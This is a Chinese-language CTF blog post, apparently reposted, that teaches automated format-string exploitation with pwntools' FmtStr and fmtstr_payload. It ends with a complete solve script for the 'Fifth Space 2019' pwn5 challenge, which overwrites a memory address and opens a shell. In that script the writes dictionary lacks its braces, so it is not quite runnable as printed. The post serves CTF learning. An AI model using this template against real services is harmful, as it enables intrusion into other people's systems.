[pwn]格式化字符串全自动exp!!!
Posted mid2dog
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[pwn]格式化字符串全自动exp!!!相关的知识,希望对你有一定的参考价值。
前言
格式化字符串一把梭真的好爽!!!!!!
再也不用绞尽脑汁去gdb调试多少个字节和几位了!!
呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此记录
以前的我做这类题心理状态:
现在的我:
总之就是非!常!爽!
这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串。
格式化字符串原理及利用
原理就不赘述啦,详情参考ctfwiki上的内容
或者搜索下,其他很多大佬写的文章都超级棒!!
利用的话,如下:
利用格式化字符串的漏洞,一般会有如下几种操作:
泄露栈内存
获取某个变量的值
获取某个变量对应地址的内存
泄露任意地址内存
利用GOT表得到libc函数地址,进而获取libc,进而获取其它libc函数地址
盲打,dump整个程序,获取有用信息
pwntools中自带的格式化字符串漏洞函数
做题的时候容易遇到两个问题:
- 找不到偏移量是多少,也就是%n$x中的n为多少
- 写入指定地址用%n构造字节数要算的很累,而且容易算错
然后!为了解决这两个问题我翻了好久,总算翻到了点好用的!
一、针对第一个找不到偏移量的问题
pwntools自带了FmtStr函数,使用方法如下:
def exec_fmt(pad):
p = process("./fmt")
# send 还是 sendline以程序为准
p.send(pad)
return p.recv()
fmt = FmtStr(exec_fmt)
print("offset ===> ", fmt.offset)
- 直接就可以用,需要本地ELF文件(所以这个方法不能盲pwn)
- 不用去考虑pad传参传什么,Fmt函数都帮你搞定啦哈哈哈
然后只用改一下你process里的文件名就好咯 - 如果存在格式化字符串漏洞的话就能自动计算偏移出来了!
二、自动写入指定地址
- 咳咳,经过刚才的自动爆破我们已经得到了偏移量。
但!偏移量只是我们实现pwn(砰!)的一个步骤而已
接下来还需要用这个偏移量实现任意地址写或者任意地址泄露。
我们平常在%n前面拼凑字节实现改写,但现在有fmtstr_payload!
fmtstr_payload是pwntools里面的一个工具,用来简化对格式化字符串漏洞的构造工作。
# 64位格式化漏洞要设置一下上下文环境,32位注释掉这行即可
context.arch = "amd64"
fmtstr_payload(offset, writes, numbwritten=0, write_size="byte")
# 总共四个参数:
# offset --> 偏移量
# writes --> 被覆盖的地址:要写入的地址 地址都为int型,也就是不需要使用p32或者p64打包
# numbwritten --> 已经由printf函数写入的字节数,默认为0
# write_size --> 逐byte/short/int写入,默认是byte,这样发送的字节少
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)
第一个参数表示格式化字符串的偏移,也就是刚才自动算出来的。
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成
printfGOT:systemAddress;
第三个参数表示已经输出的字符个数,这里没有,为0,采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写。
fmtstr_payload函数返回的就是payload
实战[第五空间pwn5]
这里我放上自动化的题解,也可以当个模板哈哈哈
from pwn import *
host = "192.168.39.97"
port = 10002
dog=remote(host, port)
#dog = process("./fmt")
# 64位格式化漏洞要设置一下上下文环境,否则报错
# context.arch = "amd64"
def exec_fmt(pad):
p = process("./fmt")
# send 还是 sendline以程序为准
p.send(pad)
return p.recv()
fmt = FmtStr(exec_fmt)
print("offset ===> ", fmt.offset)
pay=fmtstr_payload(fmt.offset, 0x804c044: 0,write_size = "byte",numbwritten = 0)
dog.sendline(pay)
dog.sendline("0")
dog.interactive()
大功告成!每天进步亿点点
结语
虽然使用工具真的 超 级 快 乐 ,但原理也要弄懂的
也到了该睡的点了哈哈哈哈,晚安,祝大家都好梦!
pwn狗日常任务达成!biubiubiu~
以上是关于[pwn]格式化字符串全自动exp!!!的主要内容,如果未能解决你的问题,请参考以下文章